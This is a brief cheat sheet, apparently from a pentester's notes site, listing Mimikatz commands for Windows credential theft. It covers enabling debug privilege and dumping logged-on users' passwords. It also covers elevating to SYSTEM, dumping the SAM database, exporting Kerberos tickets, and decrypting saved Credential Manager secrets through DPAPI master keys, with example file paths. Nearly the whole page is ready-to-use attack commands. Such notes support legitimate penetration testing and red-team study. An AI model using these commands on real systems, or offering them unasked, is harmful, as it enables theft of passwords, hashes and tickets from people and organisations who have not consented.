Links
Comment on page

Mimikatz

A little tool to play with Windows security GitHub - gentilkiwi/mimikatz

Passwords & SAM

Launch mimikatz (as Administrator!)
mimikatz.exe
Engage SeDebugPrivilege
privilege::debug
-> OK
Whoami
token::whoami
Dump creds of all logged-on users
sekurlsa::logonpasswords
(Optional) Impersonate to nt authority\system
token::elevate
Dump sam database
lsadump::sam

Tickets

Show tickets
sekurlsa::tickets
Export tickets
kerberos::list /export

Credential manager saved credentials

Locally?
vault::cred
From DC?
dpapi::cred /in:"C:\Users\Bethany\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"
[...]
guidMasterKey : {fbd1319f-d18d-448f-92e2-287944ecf24c}
[...]
dpapi::masterkey /in:"C:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\fbd1319f-d18d-448f-92e2-287944ecf24c"
-> Look for "[domainkey]", decrypt using same command with /rpc
Last modified 2yr ago